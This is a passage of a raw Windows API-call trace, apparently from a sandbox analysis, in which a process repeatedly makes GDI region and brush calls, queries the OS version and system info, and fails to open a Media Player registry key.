lpPaint=0x1817cc) returned 0x0 [0088.231] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.231] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.231] BeginPath (hdc=0x0) returned 0 [0088.231] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.231] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.231] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.231] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.231] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.231] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.231] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.231] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.265] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401cd [0088.265] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401d0 [0088.265] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104112e [0088.265] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104112f [0088.265] CombineRgn (hrgnDst=0x104112e, hrgnSrc1=0xb60401cd, hrgnSrc2=0xb40401d0, iMode=1) returned 1 [0088.265] CombineRgn (hrgnDst=0x104112f, hrgnSrc1=0xb60401cd, hrgnSrc2=0xb40401d0, iMode=4) returned 2 [0088.265] CreateSolidBrush (color=0xff) returned 0x21010b5 [0088.265] CreateSolidBrush (color=0xff0000) returned 0x1101130 [0088.265] DeleteObject (ho=0x1101130) returned 1 [0088.265] DeleteObject (ho=0xb40401d0) returned 1 [0088.265] DeleteObject (ho=0xb60401cd) returned 1 [0088.265] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.265] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.265] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.265] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.265] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.265] BeginPath (hdc=0x0) returned 0 [0088.265] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.265] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.265] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.265] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.265] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.265] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.266] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401d0 [0088.266] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401cd [0088.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041131 [0088.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041132 [0088.266] CombineRgn (hrgnDst=0x1041131, hrgnSrc1=0xb50401d0, hrgnSrc2=0xb70401cd, iMode=1) returned 1 [0088.266] CombineRgn (hrgnDst=0x1041132, hrgnSrc1=0xb50401d0, hrgnSrc2=0xb70401cd, iMode=4) returned 2 [0088.266] CreateSolidBrush (color=0xff) returned 0x2101130 [0088.266] CreateSolidBrush (color=0xff0000) returned 0x1101133 [0088.266] DeleteObject (ho=0x1101133) returned 1 [0088.266] DeleteObject (ho=0xb70401cd) returned 1 [0088.266] DeleteObject (ho=0xb50401d0) returned 1 [0088.266] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.266] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.266] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.266] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.266] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.266] BeginPath (hdc=0x0) returned 0 [0088.266] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.266] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.266] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.266] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.266] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.266] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.266] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.266] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.266] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401cd [0088.266] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401d0 [0088.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041134 [0088.266] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041135 [0088.266] CombineRgn (hrgnDst=0x1041134, hrgnSrc1=0xb80401cd, hrgnSrc2=0xb60401d0, iMode=1) returned 1 [0088.267] CombineRgn (hrgnDst=0x1041135, hrgnSrc1=0xb80401cd, hrgnSrc2=0xb60401d0, iMode=4) returned 2 [0088.267] CreateSolidBrush (color=0xff) returned 0x2101133 [0088.267] CreateSolidBrush (color=0xff0000) returned 0x1101136 [0088.267] DeleteObject (ho=0x1101136) returned 1 [0088.267] DeleteObject (ho=0xb60401d0) returned 1 [0088.267] DeleteObject (ho=0xb80401cd) returned 1 [0088.267] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.267] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.267] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.267] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.267] BeginPath (hdc=0x0) returned 0 [0088.267] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.267] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.267] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.267] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.267] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.267] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.267] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.267] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401d0 [0088.267] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401cd [0088.267] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041137 [0088.267] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041138 [0088.267] CombineRgn (hrgnDst=0x1041137, hrgnSrc1=0xb70401d0, hrgnSrc2=0xb90401cd, iMode=1) returned 1 [0088.267] CombineRgn (hrgnDst=0x1041138, hrgnSrc1=0xb70401d0, hrgnSrc2=0xb90401cd, iMode=4) returned 2 [0088.267] CreateSolidBrush (color=0xff) returned 0x2101136 [0088.267] CreateSolidBrush (color=0xff0000) returned 0x1101139 [0088.267] DeleteObject (ho=0x1101139) returned 1 [0088.267] DeleteObject (ho=0xb90401cd) returned 1 [0088.267] DeleteObject (ho=0xb70401d0) returned 1 [0088.267] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.268] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.268] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.268] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.268] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.268] BeginPath (hdc=0x0) returned 0 [0088.268] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.268] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.268] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.268] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.268] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.268] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.268] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.268] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.268] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401cd [0088.268] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401d0 [0088.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104113a [0088.268] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104113b [0088.268] CombineRgn (hrgnDst=0x104113a, hrgnSrc1=0xba0401cd, hrgnSrc2=0xb80401d0, iMode=1) returned 1 [0088.268] CombineRgn (hrgnDst=0x104113b, hrgnSrc1=0xba0401cd, hrgnSrc2=0xb80401d0, iMode=4) returned 2 [0088.268] CreateSolidBrush (color=0xff) returned 0x2101139 [0088.268] CreateSolidBrush (color=0xff0000) returned 0x110113c [0088.268] DeleteObject (ho=0x110113c) returned 1 [0088.268] DeleteObject (ho=0xb80401d0) returned 1 [0088.268] DeleteObject (ho=0xba0401cd) returned 1 [0088.268] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.268] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.268] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.268] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.268] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.268] BeginPath (hdc=0x0) returned 0 [0088.268] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.269] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.269] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.269] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.269] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.269] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401d0 [0088.269] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401cd [0088.269] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104113d [0088.269] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104113e [0088.269] CombineRgn (hrgnDst=0x104113d, hrgnSrc1=0xb90401d0, hrgnSrc2=0xbb0401cd, iMode=1) returned 1 [0088.269] CombineRgn (hrgnDst=0x104113e, hrgnSrc1=0xb90401d0, hrgnSrc2=0xbb0401cd, iMode=4) returned 2 [0088.269] CreateSolidBrush (color=0xff) returned 0x210113c [0088.269] CreateSolidBrush (color=0xff0000) returned 0x110113f [0088.269] DeleteObject (ho=0x110113f) returned 1 [0088.269] DeleteObject (ho=0xbb0401cd) returned 1 [0088.269] DeleteObject (ho=0xb90401d0) returned 1 [0088.269] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.269] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.269] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.269] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.269] BeginPath (hdc=0x0) returned 0 [0088.269] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.269] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.269] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.269] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.269] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.269] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.269] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.270] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401cd [0088.270] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401d0 [0088.270] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041140 [0088.270] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041141 [0088.270] CombineRgn (hrgnDst=0x1041140, hrgnSrc1=0xbc0401cd, hrgnSrc2=0xba0401d0, iMode=1) returned 1 [0088.270] CombineRgn (hrgnDst=0x1041141, hrgnSrc1=0xbc0401cd, hrgnSrc2=0xba0401d0, iMode=4) returned 2 [0088.270] CreateSolidBrush (color=0xff) returned 0x210113f [0088.270] CreateSolidBrush (color=0xff0000) returned 0x1101142 [0088.270] DeleteObject (ho=0x1101142) returned 1 [0088.270] DeleteObject (ho=0xba0401d0) returned 1 [0088.270] DeleteObject (ho=0xbc0401cd) returned 1 [0088.270] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.270] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.270] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.270] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.270] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.270] BeginPath (hdc=0x0) returned 0 [0088.270] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.270] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.270] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.270] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.270] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.270] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.270] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401d0 [0088.270] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401cd [0088.270] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041143 [0088.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041144 [0088.271] CombineRgn (hrgnDst=0x1041143, hrgnSrc1=0xbb0401d0, hrgnSrc2=0xbd0401cd, iMode=1) returned 1 [0088.271] CombineRgn (hrgnDst=0x1041144, hrgnSrc1=0xbb0401d0, hrgnSrc2=0xbd0401cd, iMode=4) returned 2 [0088.271] CreateSolidBrush (color=0xff) returned 0x2101142 [0088.271] CreateSolidBrush (color=0xff0000) returned 0x1101145 [0088.271] DeleteObject (ho=0x1101145) returned 1 [0088.271] DeleteObject (ho=0xbd0401cd) returned 1 [0088.271] DeleteObject (ho=0xbb0401d0) returned 1 [0088.271] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.271] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.271] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.271] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.271] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.271] BeginPath (hdc=0x0) returned 0 [0088.271] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.271] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.271] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.271] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.271] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.271] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.271] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.271] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.271] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401cd [0088.271] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401d0 [0088.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041146 [0088.271] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041147 [0088.271] CombineRgn (hrgnDst=0x1041146, hrgnSrc1=0xbe0401cd, hrgnSrc2=0xbc0401d0, iMode=1) returned 1 [0088.271] CombineRgn (hrgnDst=0x1041147, hrgnSrc1=0xbe0401cd, hrgnSrc2=0xbc0401d0, iMode=4) returned 2 [0088.271] CreateSolidBrush (color=0xff) returned 0x2101145 [0088.271] CreateSolidBrush (color=0xff0000) returned 0x1101148 [0088.271] DeleteObject (ho=0x1101148) returned 1 [0088.271] DeleteObject (ho=0xbc0401d0) returned 1 [0088.271] DeleteObject (ho=0xbe0401cd) returned 1 [0088.272] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.272] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.272] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.272] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.272] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.272] BeginPath (hdc=0x0) returned 0 [0088.272] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.272] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.272] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.272] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.272] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.272] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.272] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, 